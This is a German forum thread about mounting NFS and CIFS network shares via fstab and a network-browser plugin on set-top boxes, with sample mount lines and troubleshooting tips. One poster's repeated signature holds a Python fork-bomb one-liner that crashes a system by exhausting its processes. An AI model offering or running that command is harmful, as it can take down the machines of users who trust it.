Angepinnt Einbinden von NFS/CIFS Freigaben ab 2.4.17

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • So funktioniert's mit dem Eintrag im Networkbrowser laut Bild :freu:

    In der fstab steht dann

    Quellcode

    1. 192.168.178.15:/media/hdd/movie /media/Schlafzimmer nfs udp,x-systemd.automount,rsize=8192,noauto,wsize=8192,retry=0,x-systemd.idle-timeout=60,nolock,rw,x-systemd.device-timeout=15,timeo=2,retrans=1,vers=3,soft,nofail 0 0
    Bilder
    • screenshot.jpg

      243,53 kB, 1.920×1.080, 279 mal angesehen
  • Seit gefühlten Monaten Predigen wir hier das wenn boxen mit OE2.0 und OE2.5 per NFS verbunden werden das die nfs version angegeben werden muss.Aber immer wieder schön wie das als neuerung wahrgenommen wird.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Das ist nicht wahr es gibt genug beiträge wo sogar komplette configs gepostet wurden und wenn ich an die beiträge von gutemine denke da wurde das haarklein beschrieben.Lesen alter beiträge kann sehr nützlich sein. ;)
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Ich hatte auch zuvor automount am laufen, nun den netzwerkbrowser installiert und das Mounten hat problemlos funktioniert.
    Hab wieder auf beide Boxen Zugriff. Nur noch eine Frage, muss ich noch meine "alten" Automount Dateien löschen, oder abändern,
    oder können diese einfach so auf der Box belassen werden?
  • Habe umgestellt auf den Netzwerkbrowser und habe die mein Nas freigegeben.
    Er findet und erkennt die Freigaben, diese sind gemountet. Soweit alles gut aber ich komme dann nicht mehr auf die Dateien, hatte die Box auch u.a. neu aufgesetzt. (auto.network u.dgl ist leer)
    Da ich mehrere Freigaben habe ich auch unterschiedliche Optionen wie nolock, vers=3 etc schon probiert auch eine NFS Freigabe

    //ip_der_box/nasmovie /media/nasmovie cifs x-systemd.automount,x-systemd.device-timeout=15,password=xxxx,rsize=8192,username=user,noauto,rw,wsize=8192,x-systemd.idle-timeout=60,soft,nofail 0 0
    //ip_der_box/music /media /music cifs x-systemd.automount,password=xxxx,rsize=8192,noauto,wsize=8192,x-systemd.idle-timeout=60,nolock,rw,x-systemd.device-timeout=15,username=user,soft,nofail 0 0
    //ip_der_box/media /media /hddmedia cifs x-systemd.automount,password=xxxx,rsize=8192,noauto,wsize=8192,x-systemd.idle-timeout=60,nolock,rw,x-systemd.device-timeout=15,soft,vers=3,username=user,nofail 0 0
    //ip_der_box/export /media/1 cifs x-systemd.automount,x-systemd.device-timeout=15,password=xxxx,rsize=8192,username=user,noauto,rw,wsize=8192,x-systemd.idle-timeout=60,soft,nofail 0 0

    wenn ich die fstab manuell ändere in (wie im Beitrag s.o.)
    ip_der_box:/Nasmovie gehts auch nicht ....

    Wenn ich die 900er mit dem Rechner verbinde habe ich zugriff..... - da will ich aber gar nicht hin :)
    Meine Nas, ist eine Intel Storage als RAID5 – von meiner 500HDer Box komme ich mit den gleichen Einstellungen ohne Probleme drauf.
    Habe schon einige Posts gelesen…… habe für mich hat von Euch einer noch eine Idee?
  • Also leute ihr bringt cifs und nfs durcheinander und damit auch die Optionen der beiden freigaben vers=3 ist bei cifs kontra produktiv.
    Ich würde euch dringend empfehlen sich mit der Materie auseinander zusetzen und den networkbrowser die einträge in die fstab machen zu lassen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Habe die Einträge über den Networkbrowser gemacht.Was ich damit sagen wollte ich habe es, sowohl mit CIFS als auch mit NFS Freigaben probiert - und auch die entsprechenden User auf der Nas angelegt.
    Wie geschrieben, ich bekomme Zugriff auf die Nas und der Freigabeverzeichnis, aber ich sehe die Files nicht :(
    Habe dann auch schon einige cifs optionen druchgespielt komme aber leider nicht zum Erfolgt# Allgemein://<Server>/<Freigabe> <Mountpunkt> cifs <Liste der Optionen> 0 0
  • Auch ich habe erfolgreich von der auto.network auf fstab mittels Networkbrowser umgestellt.

    Das grösste Problem war den Domänen Namen einzugeben. X Beiträge habe ich durchsucht und gelesen, jedoch wurde nirgends auf die Netzwerkdomäne eingegangen. Ich hatte mich völlig verrant und wollte immer beim Benutzernamen zusätzlich die Domain eingeben. Alles falsch.
    Einfach bei den Optionen zusätzlich "domain=Domäne" dazuschreiben.
    z.Bsp.:
    rw,domain=meinedomaene

    Greeeeeez
    Marc
  • Meine, mich zu erinnern, dass wenn die Benutzerdaten nicht passen, ich zwar das Verzeichnis, aber nicht deren Inhalte sehen zu können.

    @brauchstfragen: sind das auf deinem NAS NFS oder Samba Freigaben? Was passiert, wenn Du mit Windows über die Netzwerkqeue auf die Freigaben schaust?

    im Explorer mal: \\ip_der_nasbox\ eingeben und doppelt auf die angezeigten Freigaben klicken. Bei Abfrage Username und vermutetes Passwort eingeben. Wäre die Kontrolle, ob das Passwort und der User auch passen.
    "Alle sagen: Es geht nicht!
    Bis einer kommt, der es nicht wusste
    und es einfach gemacht hat!"
  • rmacs schrieb:

    Auch ich habe erfolgreich von der auto.network auf fstab mittels Networkbrowser umgestellt.

    Das grösste Problem war den Domänen Namen einzugeben. X Beiträge habe ich durchsucht und gelesen, jedoch wurde nirgends auf die Netzwerkdomäne eingegangen. Ich hatte mich völlig verrant und wollte immer beim Benutzernamen zusätzlich die Domain eingeben. Alles falsch.
    Einfach bei den Optionen zusätzlich "domain=Domäne" dazuschreiben.
    z.Bsp.:
    rw,domain=meinedomaene

    Greeeeeez
    Marc
    Wenn Du keine Benutzerverwaltung für eine Domain hast, schaut der Server (NAS oder PC mit Freigabe) lediglich bei sich selbst nach dem anfragenden Benutzer und Passwort und lässt drauf oder nicht. Bei vorhandener Domain müssen Client und Server die Active Directory/den LDAP beid zum Authentisieren benutzen. Nur dann macht die Eingabe einer Domain Sinn.
    "Alle sagen: Es geht nicht!
    Bis einer kommt, der es nicht wusste
    und es einfach gemacht hat!"
  • Einbinden von NFS/CIFS Freigaben ab 2.4.17

    DerManuel schrieb:

    rmacs schrieb:

    Auch ich habe erfolgreich von der auto.network auf fstab mittels Networkbrowser umgestellt.

    Das grösste Problem war den Domänen Namen einzugeben. X Beiträge habe ich durchsucht und gelesen, jedoch wurde nirgends auf die Netzwerkdomäne eingegangen. Ich hatte mich völlig verrant und wollte immer beim Benutzernamen zusätzlich die Domain eingeben. Alles falsch.
    Einfach bei den Optionen zusätzlich "domain=Domäne" dazuschreiben.
    z.Bsp.:
    rw,domain=meinedomaene

    Greeeeeez
    Marc
    Wenn Du keine Benutzerverwaltung für eine Domain hast, schaut der Server (NAS oder PC mit Freigabe) lediglich bei sich selbst nach dem anfragenden Benutzer und Passwort und lässt drauf oder nicht. Bei vorhandener Domain müssen Client und Server die Active Directory/den LDAP beid zum Authentisieren benutzen. Nur dann macht die Eingabe einer Domain Sinn.


    Natürlich geht es hier um ein Active Directory, sonst hätte ich mich ja mit nur Benutzername und Passwort anmelden können.



    Gesendet von iPhone mit Tapatalk
  • Dann Danke dafür und den Hinweis, dass dies nur in Umgebungen nötig ist, die Verzeichnisdienste wie LDAP oder ADS bereitstellen.
    Würde mich interessieren, wer das bei sich zuhause so abbildet!
    "Alle sagen: Es geht nicht!
    Bis einer kommt, der es nicht wusste
    und es einfach gemacht hat!"

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von DerManuel ()

  • Lege die User als Windows/Mac OS X user (CIFS) an Zugriff über NFS. Danke für den Hinweis aber ich verwende keine Domain.

    „Im Explorer mal: \\ip_der_nasbox\ eingeben und doppelt auf die angezeigten Freigaben klicken. Bei Abfrage Username und vermutetes Passwort eingeben. Wäre die Kontrolle, ob das Passwort und der User auch passen.“

    Ja geht – habe auch verschiedenen User angelegt, auch mal einfache Freigaben, geht aber nicht mal mit meinem Admin, wie oben geschrieben habe es schon xmal probiert und bei meiner 500hd geht’s. In der Mount Übersicht schaut es gut aus, habe es etwas verpixelt :)
    Bilder
    • screenshot3.png

      77,15 kB, 1.280×720, 126 mal angesehen

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von brauchstfragn ()